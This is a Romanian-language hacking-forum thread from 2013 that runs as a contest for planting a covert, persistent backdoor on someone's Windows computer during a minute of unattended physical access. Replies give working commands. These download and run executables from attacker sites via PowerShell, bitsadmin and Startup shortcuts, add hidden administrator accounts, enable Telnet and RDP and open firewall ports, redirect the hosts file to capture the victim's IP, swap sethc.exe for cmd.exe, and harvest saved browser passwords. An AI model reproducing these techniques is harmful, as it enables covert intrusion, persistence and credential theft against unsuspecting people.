em Posted May 4, 2013 Report Posted May 4, 2013 Sa presupunem ca esti la cineva acasa si lipseste un timp foarte scurt de la calculator (30secunde - 1minut).Scopul tau. Sa iti asiguri un backdoor permanent la acel calculator.Piedici:* Calculatorul nu are net in acel moment.* Nu ai cu tine niciun stick USB/CD whatevar.* Ownerul calculatorului nu trebuie sa se prinda de nimic.Va castiga cel cu solutia cea mai ingenioasa care ofera controlul cel mai mare la resursele sistemului. Luati in calcul si un posibil antivirus.Restrictii:* WindowsPremiu:* O carte de programare. (cat 2 biblii) Quote
em Posted May 4, 2013 Author Report Posted May 4, 2013 Allow RDP ./threadDecent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta? Quote
Renegade Posted May 4, 2013 Report Posted May 4, 2013 - sa incercam sa configuram un RDP pe acel sistem.- am mai putea crea un fisier.bat care sa downloadeze si mai apoi sa execute un fisier de pe un ftp sau site (pentru executare sa il punem in start-up sau intr-un autorun.inf pe toate partitiile)Sunt curios ce raspunsuri vor da altii deoarece timpul acordat e foarte scurt,surse externe nu ai pentru a downloada,instala altceva.Daca considerati ca am scris SF-uri,va rog corectati-ma Quote
sandabot Posted May 4, 2013 Report Posted May 4, 2013 Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?Mai am timp sa schimb homepage-ul de la browser cu un link care iti trimite automat adresa de IP prin mail (sunt destule servicii free pe net) , imediat ce se conecteaza la internet si deschide browserul , voi primi un mail cu IP-ul sau . Quote
Renegade Posted May 4, 2013 Report Posted May 4, 2013 @sandabot - sau sa setezi ca homepage un site facut de tine care sa scrie IP-ul victimei intr-un fisier tot la tine pe site si imediat sa il redirectioneze pe google,sau alta pagina. Quote
Silviu Posted May 4, 2013 Report Posted May 4, 2013 Fisier bat:start PowerShell.exe(New-Object System.Net.WebClient).DownloadFile("http://site.net/fisier.exe","C:\fisier.exe")start C:\fisier.exeDoar o idee.. Quote
BogdanNBV Posted May 4, 2013 Report Posted May 4, 2013 (edited) Stergi system32, te faci ca ploua cand vede ca nu mai merge, si cum te stie bun in d-ale pc-urilor te cheama sa il reinstalezi.Ai castigat timp cacalau pana a 2-a zi sau cand te duci sa-l instalezi sa te pregatesti cu tot ce vrei.Ideea e sa-l strici in alea 45 secunde sau cat ai si dupaia te oferi sa-i reinstalezi sistemul de operare => timp suficient pentru orice Edited May 4, 2013 by BogdanNBV Quote
eusimplu Posted May 4, 2013 Report Posted May 4, 2013 Daca era laptop:Imi „tranformam” telefonul intr-un hotspot wifi, iar odata ce laptop-ul avea internet ii puteam downloada pana si filme porno fara sa-si dea seama.Daca era PC sau laptop si avea AutoIt instalat:Asta s-ar fi putut intampla foarte rar, dar nu excludem cazul.Faceam un script in AutoIt care sa-mi poata asigura backdoorul si sa-mi poata oferii ip-ul si-l puneam sa ruleze la fiecare pornire. (chiar dureaza putin)Sa nu-mi spuneti ca nu aveam telefonul la mine, asa ceva nu exista Quote
nedo Posted May 4, 2013 Report Posted May 4, 2013 Modific in hosts cateva site-uri sa indice catre clone facute/hostate de mine.(pentru a obtine ip-ul)Creez un user nou cu o parola pusa de mine si activez optiunea de rdp.creez un mic bat care sa se conecteze prin telnet la mine si sa imi trimita ip-ul si poate alte informatiibat-ul il bag la autorun pe toate partitiile.Modific in group policy sa nu faca lock-out dupa un anumit numar de incercari de logare, si incerc sa fac bruteforce dupa aia(conjunctie cu telnetu/hosts-ul).Modific tot in gp sa ma pot loga cu guest prin rdp. Quote
em Posted May 4, 2013 Author Report Posted May 4, 2013 Modific in hosts cateva site-uri sa indice catre clone facute/hostate de mine.(pentru a obtine ip-ul)Creez un user nou cu o parola pusa de mine si activez optiunea de rdp.creez un mic bat care sa se conecteze prin telnet la mine si sa imi trimita ip-ul si poate alte informatiibat-ul il bag la autorun pe toate partitiile.Modific in group policy sa nu faca lock-out dupa un anumit numar de incercari de logare, si incerc sa fac bruteforce dupa aia(conjunctie cu telnetu/hosts-ul).Modific tot in gp sa ma pot loga cu guest prin rdp.Si in acelasi timp, mergi cu viteza luminii astfel incat timpul sa se dilate. Cele 2 minute care ti-au luat sa faci asta vor parea 45 de secunde pentru tinta. Quote
black_death_c4t Posted May 4, 2013 Report Posted May 4, 2013 (edited) start > run > cmdnet user Administrator /active:yesnet user (username) (password) /addnet localgroup Administrators /add (username)net localgroup /add TelnetClientsnet localgroup TelnetClients /add (username)sc config TlntSvr start= autonet start TlntSvrnetshfirewalladd portopening TCP 23 "Telnet" nextecho www.google.ro www.domeniulmeu.ro >> C:\Windows\System32\drivers\etc\hostscand ajung acasa pun pe domeniulmeu.ro un iframe mare spre pagina de goagal si inserez un mic script ce inregistreaza ip-ul ce ajunge pe pagina(optional) comenzile pot fi puse intr-un bat si pregatite din timp , astfel incat tot ce avem de facut e sa accesam domeniul.ro/batulmeu.bat , descarcam si executam bat-ul si aia e , asteptam. Edited May 4, 2013 by black_death_c4t Quote
nedo Posted May 4, 2013 Report Posted May 4, 2013 Nu toate Ori una ori alta.Modifici host si crezi fisierul batsau Creezi un user nou si activezi rdpSauModifici in gp lockout-ul la parola gresita si bat-ul/hostssauModific in gp sa ma pot loga cu guest prin rdp si bat-ul/hosts Quote
DarkyAngel Posted May 4, 2013 Report Posted May 4, 2013 start > run > cmdnet user Administrator /active:yesnet user (username) (password) /addnet localgroup Administrators /add (username)net localgroup /add TelnetClientsnet localgroup TelnetClients /add (username)sc config TlntSvr start= autonet start TlntSvrnetshfirewalladd portopening TCP 23 "Telnet" nextecho www.google.ro www.domeniulmeu.ro >> C:\Windows\System32\drivers\etc\hostscand ajung acasa pun pe domeniulmeu.ro un iframe mare spre pagina de goagal si inserez un mic script ce inregistreaza ip-ul ce ajunge pe paginacomenzile pot fi puse intr-un bat si pregatite din timp , astfel incat tot ce avem de facut e sa accesam domeniul.ro/batulmeu.bat , descarcam si executam bat-ul si aia e , asteptam.nu are net pentru desc?rcarea .bat-ului, ?i ca s? nu-?i dea seama, noi avem deja preg?tit un site care face request pe un ?url= ?i dup? ce îi ia ip îi face redirect pe url-ul respectiv, astfel ii punem doar homepageul in hosts . Quote
Cryo Posted May 4, 2013 Report Posted May 4, 2013 (edited) Decent? calea pe care ai pornit. Mai r?mâne de stabilit ce IP are victima. Cum faci asta?Dupa ce se termina toata faza cu 45sec, ulterior vorbim pe mess si ii aflu ip-ul prin oricare 1000 de metode disponibile (ii arat poza/pagina, fisier, apel audio/video). Edited May 4, 2013 by Cryo Quote
curiosul Posted May 4, 2013 Report Posted May 4, 2013 (edited) Cu putin antrenament scoti sub 35-40 de secunde:Creezi un .bat cu:bitsadmin /transfer /download downloadlink.cv C:\StartupDirIl salvezi intr-un folder sa nu-l gaseasca dupa care creezi o scurtatura in startup a acestui script cu optiunea Run: Minimized.Daca victima este idioata direct liniile alea la startup.In cazul in care mai ramane umpic de timp activezi si RDP iar ip-ul il prinzi pe hostul cu fisierul.O sa vin cu o demonstratie video daca este cazul. Wow, cand am intrat era un singur post, acuma... Edit2: Daca vrei se fie ceva mai piperat challenge-ul impune ca victima sa nu fie un idiot ci o presoana care stie cu ce se mananca un calculator, presupunem ca suntem in sediul unei firme, primarii sau alte institutii. Edited May 4, 2013 by curiosul Quote
FreddieTux Posted May 4, 2013 Report Posted May 4, 2013 Vechea metoda cu sticky keys: deschizi %windir%/System32/, faci o copie de siguranta a lui sethc.exe si apoi copiezi cmd.exe in locul lui. Partea buna e ca ai un fel de "backdoor" in sensul ca poti porni consola cu drepturi de administrator direct din ecranul de autentificare, dar partea rea e ca asta se poate face doar local. Quote
Silviu Posted May 4, 2013 Report Posted May 4, 2013 Ideea numarul 2:Fisier .batstart /min chrome.exe ^& exitstart http://site.tld/fisier.exesleep 10000taskkill /IM chrome.exestart C:\Users\user\Downloads\fisier.exeUnde chrome.exe este browserul default. Quote
DarkyAngel Posted May 4, 2013 Report Posted May 4, 2013 hai s? v? propun ?i eu o metod? mai eficient? .- homepageul browserului lui default in hosts spre un link de-al nostru care ii ia ip, apoi face redirect pe $_SERVER['HTTP_HOST']; ( în cazul ?sta, putem avea de dinainte preg?tit scriptul, e folositor s? ai a?a ceva preg?tit oricând)- un simplu ?i rapid enable la terminal server din cpanel ?i disable din acela?i loc la firewallacas?, pur ?i simplu folosim unul din zecile de exploituri referitoare la terminal server, gen MS Windows (RPC DCOM) Remote Exploit (Universal Targets). în caz c? nu merge chiar niciunul (0,01% ?ans?) putem da ?i bruteforce cu tsgrinder, ?i avem acces la "terminal" în windows, de unde putem da enable ?i la rdp, ?i multe altele, f?r? ca "ownerul" s?-?i dea seama Quote
Cryo Posted May 4, 2013 Report Posted May 4, 2013 intri in cstrike/resource/GameMenu.res si modifici astfel incat atunci cand da click cand pe "Find servers" sa se conecteze la un domeniu imaginar de-al tau ..... gen cs.ablasadubsa.com (sa fie totusi memorabil), ulterior cumperi domeniul si iti pui serverul de cs pe el, se va conecta la serverul tau si stim cu totii ce securitate are cs....plus ca jocul ruleaza cu privilegii de administrator (in 99.9% din cazuri), si antivirusul nu va comentain cs serverul poate rula fara probleme comenzi consolele clientilorsi avem un oarecare control asupra sistemului Quote
em Posted May 4, 2013 Author Report Posted May 4, 2013 intri in cstrike/resource/GameMenu.res si modifici astfel incat atunci cand da click cand pe "Find servers" sa se conecteze la un domeniu imaginar de-al tau ..... gen cs.ablasadubsa.com (sa fie totusi memorabil), ulterior cumperi domeniul si iti pui serverul de cs pe el, se va conecta la serverul tau si stim cu totii ce securitate are cs....plus ca jocul ruleaza cu privilegii de administrator (in 99.9% din cazuri), si antivirusul nu va comentain cs serverul poate rula fara probleme comenzi consolele clientilorsi avem un oarecare control asupra sistemuluiCurios stiam ca exista exploituri la CS. Cel clasic este in motd-ul care apare dupa ce te-ai conectat la un server pentru ca era randat de Internet Explorer. Dar nu stiu de comenzi date de admin care ar putea compormite securitatea calculatorului. Poti da un exemplu? Exista comenzi care iti permit de exemplu sa scrii fisiere? Quote
DarkyAngel Posted May 4, 2013 Report Posted May 4, 2013 Curios stiam ca exista exploituri la CS. Cel clasic este in motd-ul care apare dupa ce te-ai conectat la un server pentru ca era randat de Internet Explorer. Dar nu stiu de comenzi date de admin care ar putea compormite securitatea calculatorului. Poti da un exemplu? Exista comenzi care iti permit de exemplu sa scrii fisiere?vorbe?te prostii. singurele comenzi care pot fi executate asupra juc?torului sunt doar comenzile care le poate da ?i juc?torul singur ( quit, kill, connect server.plm, sensitivity 8.0, etc), nu ai control în afara cs-ului. cel cu motd ar fi fost singura op?iune Quote
Cryo Posted May 4, 2013 Report Posted May 4, 2013 (edited) da, poti sa-l faci sa downlodeze/suprascrie fisiere din folderul cstrikeam citit undeva niste sf-uri de genul:-rulezi niste comenzi ce schimba locatia si numele fisierului in care jocul isi tine logul, si il pui in folderul de Startup cu extensia .bat -scrii linii in log(cod)-stim cu totii ce se intampla la urmatoarea porniredar merge foarte bine si cu motd, chiar am uitat de astaEDIT: am aflat ca nu functioneaza cazul acela sf, deci ramane motddar eu as fi facut altceva...m-as fi uitat in parolele puse pe remember de browser si as fi memorat cat mai multemerge repede: tools->options->security->saved passwords, sau ceva de genuoricum meniurile sunt intuitive Edited May 4, 2013 by Cryo Quote
h4sh Posted May 4, 2013 Report Posted May 4, 2013 (edited) 1.Deschizi internet browser-ul(5 secunde)2.Retii homepage-ul initial si modifici homepage-ul astfel incat sa corespunda cu url catre host-ul sau pagina pe care ai incarca un posibil backdoor (5-10 secunde);3.Modifici sau bifezi (daca e cazul) optiunea "Save files to.." si retii adresa(path-ul) la care ar fi salvat backdoor-ul(5-10 secunde);4.Modifici registrii,tinand cont de path-ul unde backdoorul va fi descarcat in momentul in care victima ar redeschide explorerul,in asa fel incat StartUp-ul sa ruleze backdoorul de fiecare data cand calculatorul ar fi reboot-at (10 secunde);Cam atat ar fi de facut.Apoi creezi pagina(in cazul in care nu ai fi facut-o inainte) si ai grija ca sa modifici codul paginii respective in asa fel incat,dupa un interval scurt dupa momentul in care victima ar deschide explorerul(ceea ce ar declansa descarcarea automata a backdoor-ului) sa-l redirectioneze catre pagina initiala la care ar fi fost setata optiunea de HomePage a explorerului(vezi pasul 2 "Retii home page-ul initial") pentru a nu atrage atentia.Apoi creezi un server de ascultare depinzand de backdoor,parametrii si utilitate(in cazul in care ai folosi Metasploit) si pe urma depinde numai de tine...Astept critici.. Edited May 4, 2013 by h4sh Quote
dicksi Posted May 4, 2013 Report Posted May 4, 2013 (edited) ipul nu e atat de important fiindca se poate obtine foarte usor: dupa id de yahoo messenger(sau te duci in yahoo/profiles) sau skype, si apoi afli online cu Get Yahoo Messenger Ip sau SkypeGrab - Free Skype Resolverin 30 sec max:system proprieties/allow connection from computers running any version of remote desktopLocal Security Policy > Security Settings > Local Policies > Security OptionsAt the top of the list is "Accounts: Limit local account use of blank passwords to console logon only"pus pe disabled sauHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse set 0ip>rdp>bootkit Edited May 4, 2013 by dicksi Quote